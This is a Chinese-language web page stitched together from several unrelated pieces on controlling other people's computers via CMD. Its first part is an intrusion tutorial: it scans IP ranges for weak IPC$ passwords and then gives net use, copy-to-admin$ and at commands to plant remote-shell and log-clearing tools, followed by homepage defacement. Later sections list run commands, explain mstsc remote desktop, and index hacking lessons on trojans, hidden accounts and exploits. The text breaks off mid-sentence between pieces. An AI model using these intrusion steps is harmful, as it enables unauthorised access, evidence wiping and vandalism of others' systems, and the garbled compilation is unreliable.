1.怎样用CMD命令控制对方电脑
你知道IPC$漏洞吗??
什么是IPC:
IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。
IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。
注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。
可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …
2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。
在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。
图1-2
3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机
4、探测中…… (图-4)
(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)
有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。
黑了他 !
开个dos prompt 执行如下命令,本次用的例子如下图。
1、net use \对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接
2、copy icmd.exe \对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。
3、net time \对方IP || 看看对方的本地时间
4、at \对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。
5、telnet 对方ip 端口 ||
6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||
7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\pmgmt.msc---计算机管理
11. conf-----------启动netmeeting
12. dcomcnfg-------打开系统组件服务
13. ddeshare-------打开DDE共享设置
14. devmgmt.msc--- 设备管理器
15. dfrg.msc-------磁盘碎片整理程序
16. diskmgmt.msc---磁盘管理实用程序
17. drwtsn32------ 系统医生
18. dvdplay--------DVD播放器
19. dxdiag---------检查DirectX信息
20. explorer-------打开资源管理器
21. eudcedit-------造字程序
22. eventvwr-------事件查看器
23. fsmgmt.msc-----共享文件夹管理器
24. gpedit.msc-----组策略
25. iexpress-------木马捆绑工具,系统自带
26. logoff---------注销命令
27. lusrmgr.msc----本机用户和组
28. notepad--------打开记事本
29. magnify--------放大镜实用程序
30. mem.exe--------显示内存使用情况
31. mmc------------打开控制台49.
32. mobsync--------同步命令
参考资料:搜狗百科-CMD命令
9.远程控制电脑命令
在电脑中都是自带有远程桌面连接功能,主要用于登陆远程服务器,我们可以通过命令的方式来打开操作,但是很多新手小白可能还不知道远程桌面快捷命令是什么,又该如何使用呢?不用担心,本文给大家演示一下远程控制电脑命令的详细使用步骤吧,有一样需求的用户们跟着来看看。
方法一:通过运行命令远程连接
1、在我们的电脑上按win+R键打开运行,输入“mstsc”,点击确定;

2、点击确定之后,可以看到已经打开了远程桌面连接,输入要连接的ip地址,也可以点击选项,输入详细信息,进行连接;

3、点击选项之后,输入ip地址,远程连接的计算机名称,点击连接;

4、可以看到已经在远程连接电脑了,只要远程连接的电脑设置了允许远程,就能连接到对方电脑桌面上。

方法二:通过命令提示符远程连接
1、在我们的电脑上按win+R键打开运行,输入“cmd”;

2、在命令提示符中输入“mstsc /v: 192.168.1.250 /console”命令,按回车键,远程连接ip地址为192.168.1.250的电脑。

上述就是远程控制电脑命令如何用的详细步骤,只要按照上面的方法就可以连接
10.cmd命令有什么可以控制别人电脑
02 黑客的发展过程 03 黑客精英轶事 04 中国黑客精英组成 05 网络发展简史 06 Internet发展面临的问题 07 Internet的发展技术 08 网络的定义及特点 10 OSI七层模型 11 TCPIP协议教程 12 常用端口 13 PING命令及用法 14 TRACERT命令及用法 15 NBTSTAT命令及用法 16 NET命令大全 17 AT命令及用法 18 FTP命令及用法 19 IPCONFIG命令及用法 20 黑客常见攻击步骤 21 CMOS密码篇 22 Windows 98共享密码破解 23 恶意网页病毒症状及修复 24 拒绝服务攻击 25 DDoS攻击使用的常用工具 26 Nmap网络安全扫描器 27 扫描器SuperScan使用指南 28 X-SCAN网络安全扫描器的使用 29 X-way安全扫描器使用介绍 30 20cn的IPC扫描器 31 远程控制DameWare Mini版 32 Radmin使用教程 33 黑客瑞士军刀NC使用教程 34 缓冲区溢出定位初学体会 35 1433的溢出攻击 36 ipc常见问题 37 IPC$入侵资料! 38 SNMP口令的利用及相关知识 39 木马常用骗术大观 40 木马各种隐藏技术大披露 41 自己做不被杀的木马 42 挖出你爱机中的“木马” 43 电脑木马查杀大全 44 如何建立隐藏的超级用户 网络安全基础班配套视频教程01 ping命令的使用 02 netstat命令的使用 03 tasklist和taskkill的使用 04 扫描器X-SCAN的使用(上) 05 扫描器X-SCAN的使用(下) 06 先试手:Ipc漏洞简单攻击 07 shed共享扫描器的使用 08 superscan3扫描器的使用 09 流光扫描器的应用 10 win2000自动攻击器的使用 11 俄罗斯扫描器SSS简单使用 12 dameware远程管理工具的使用 13 找回ADSL拨号的密码. 14 缓冲区及溢出的道理视频教程 15 溢出例子和分析视频教程 16 Shellcode介绍视频教程 17 缓冲区溢出简单利用视频教程 18 构造利用视频教程 19 FOXMAIL漏洞编写-漏洞公告 20 FOXMAIL漏洞编写-溢出定位 21 FOXMAIL漏洞-shellcode编写 22 IIS.printer利用程序 23 JMPCALL EBX溢出利用方式 24 JMP ESP改写 JMP EBX课程 25 IDQ-IDA漏洞利用程序编写 26 ShellCode的基本概念 27 打开CMD的方法-1 28 打开CMD的方法-2 29 打开CMD的方法-3 30 打开CMD的方法-4 31 shellcode通用性初步探讨 32 Windows对话框的编写-1 33 Windows对话框的编写-2 34 给系统添加用户-1 35 给系统添加用户-2 36 黑客工具NC的使用教程 37 智能ABC和guest帐号问题 38 MS05039漏洞利用教程 39 Iris分析TCP_IP协议谈-001 40 Iris分析TCP_IP协议谈-002 41 Iris分析TCP_IP协议谈-003 42 在系统中建立隐藏帐号 43 autorun介绍与利用 44 iis的安全配置介绍 45 realplay网页木马的制作方法 46 radmin远程管理的配置 47 Virtual PC虚拟机的使用 48 pstools工具包简单使用 49 telnet和ntlm认证问题 50 堆栈和堆缓冲区溢出比较-001 51 堆栈和堆缓冲区溢出比较-002 52 堆栈和堆缓冲区溢出-003 53 堆栈和堆缓冲区溢出比较-004 54 Iris网络嗅探器使用与技巧01 55 Iris网络嗅探器使用技巧02 查看原帖>>。
转载请注明出处windows之家 » win10如何通过cmd命令操控远程电脑